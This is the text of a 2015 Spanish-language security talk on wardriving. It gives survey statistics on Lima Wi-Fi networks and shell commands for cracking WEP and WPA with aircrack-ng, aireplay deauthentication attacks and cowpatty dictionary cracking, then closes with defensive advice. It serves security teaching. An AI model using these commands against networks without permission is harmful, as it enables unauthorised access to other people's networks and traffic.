Dec 25, 2015
Omar Palomino - CEH Consultor en Seguridad de Información
aula H4XOR O
mar Palo
min
o
Wardriving and wireless
penetration testing
Estadísticas de seguridad en Lima Metropolitana Técnicas para penetrar redes WEP Técnicas para penetrar redes WPA Demostración en vivo
¿Quién soy?
• Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas
• Consultor en Seguridad de información - Digiware, CEH
• “10 años” de experiencia en seguridad de información
• Psicólogo que aun no comienza sus estudios….
• Escritor en mis tiempos libres:
http://www.el-palomo.com
¿Qué es Wardriving?
Es la búsqueda de redes inalámbricas Wi-Fi desde un
vehículo en movimiento. Cuando se realiza la misma
actividad caminando se le llama “warwalking”.
¿Qué es Wardriving?
Los hackers pintaban señales en las calles para “documentar”
las redes encontradas.
¿Nunca has visto esos símbolos?
En la actualidad se usan dispositivos GPS y GoogleEarth
para documentar las redes encontradas.
¿Nunca has visto esos símbolos?
¿Nunca has visto esos símbolos?
Inicio del proyecto: 01 Abril, 2011
Distritos:
Cercado Callao
San Isidro
San Miguel
Miraflores
La Molina
Los Olivos
San Borja
Proyecto Wardriving
Proyecto Wardriving
70%
29%
1%
Redes WiFi – Lima Metropolitana
WEP WPA Abiertas
WEP: 28 531 redes
WPA :11 713 redes
Abiertas: 322 redes
Proyecto Wardriving
DEMOSTRACIÓN DE
WARDRIVING
¿Es posible hackear redes WIFI?
WIRELESS
WEP WAP
• Sí, se puede hackear.
• Capturar 40 mil – 120 mil paquetes
• Tarda entre 10 min – 20 min
• Depende de la complejidad de la contraseña.
• Rainbow tables
• Tiempo indeterminado
Características WEP
RC4 = Rivest Cipher #4
Ataques FMS optimizado H1KARI
Ataques KoreK (IVs únicos)
2004 se publica Aircrack poniendo en práctica los ataques KoreK
La incorporación de inyección de paquetes mejoro sustancialmente los tiempos
Características WPA
WPA WPA2
Modo Enterprise Autenticación 802.1X / EAP Autenticación 802.1x / EAP
Encriptación TPKI / MIC Encriptación AES - CCMP
Modo Personal Autenticación: PSK Autenticación: PSK
Encriptación TPKI / MIC Encriptación AES - CCMP
Vulnerando redes WEP
Vamos a la
práctica – en vivo
Vulnerando redes WEP
Capturando paquetes
Shell# Airmong –ng
Shell# macchanger –mac 00:11:22:33:44:55
Shell# airmong start wlan0 <channel>
Shell# airodump-ng mon0
Shell# airodump-ng –c <channel> -w <file> --bssid <bssid> mon0
Inyectando paquetes
Shell# aireplay-ng -1 0 –a <bssid> -h 00:11:22:33:44:55 mon0
Shell# aireplay-ng -3 –b <bssid> -h 00:11:22:33:44:55 mon0
Obteniendo la contraseña
Shell# aircrak-ng –b <bssid> <file.cap>
Vulnerando redes WEP
Vulnerando redes WPA
Vamos a la
práctica – en vivo
Vulnerando redes WPA
Capturamos sólo el Handshake
Ataque 0 – deautenticación
Shell# aireplay –0 5 –a 00:30:BD:98:CE:62 –C 00:15:E9:B1:33:53 mon0
-0 = ataque de des-autenticación
5 = número de segundos que durará el ataque
-a = BSSID del AP
-c = mac del cliente
PSK= PMK = PBKDF2 (frase, SSID, longitud SSID 4096,256)
Vulnerando redes WPA
Comprobamos que hemos capturado el handshake:
Shell# aircrak-ng <file.cap>
Necesitamos un
diccionario!
3 Métodos de craking
1. Aircrack + Diccionario
Shell# aircrak-ng –w <diccionario_ruta> <handshake.cap>
2. Cowpatty + Diccionario (excesivo procesamiento)
Shell# cowpatty –f <diccionario_ruta> -r <handshake.cap> -s SSID
3. Cowpatty + genpmk (muy rápido, 20000 palabras por segundo)
Shell# genpmk –f <diccionario_ruta> -d HASHFILE –s SSID
Shell# cowpatty –r <handshake.cap> -d HASHFILE –s SSID
¿Cómo evito que me hackeen?
Olvídate de WEP, ni siquiera lo pienses!! Sí, a ti te digo!
Utiliza WPA con una contraseña con criterios de dificultad
Filtrado MAC y ocultar el SSID, tampoco lo pienses!
“Existen algunas soluciones que brindan WIDS/WIPS”
Gracias por participar muy pronto estamos en provincias
para más información ingresa a nuestra web
En el 2012 mucho más de nosotros…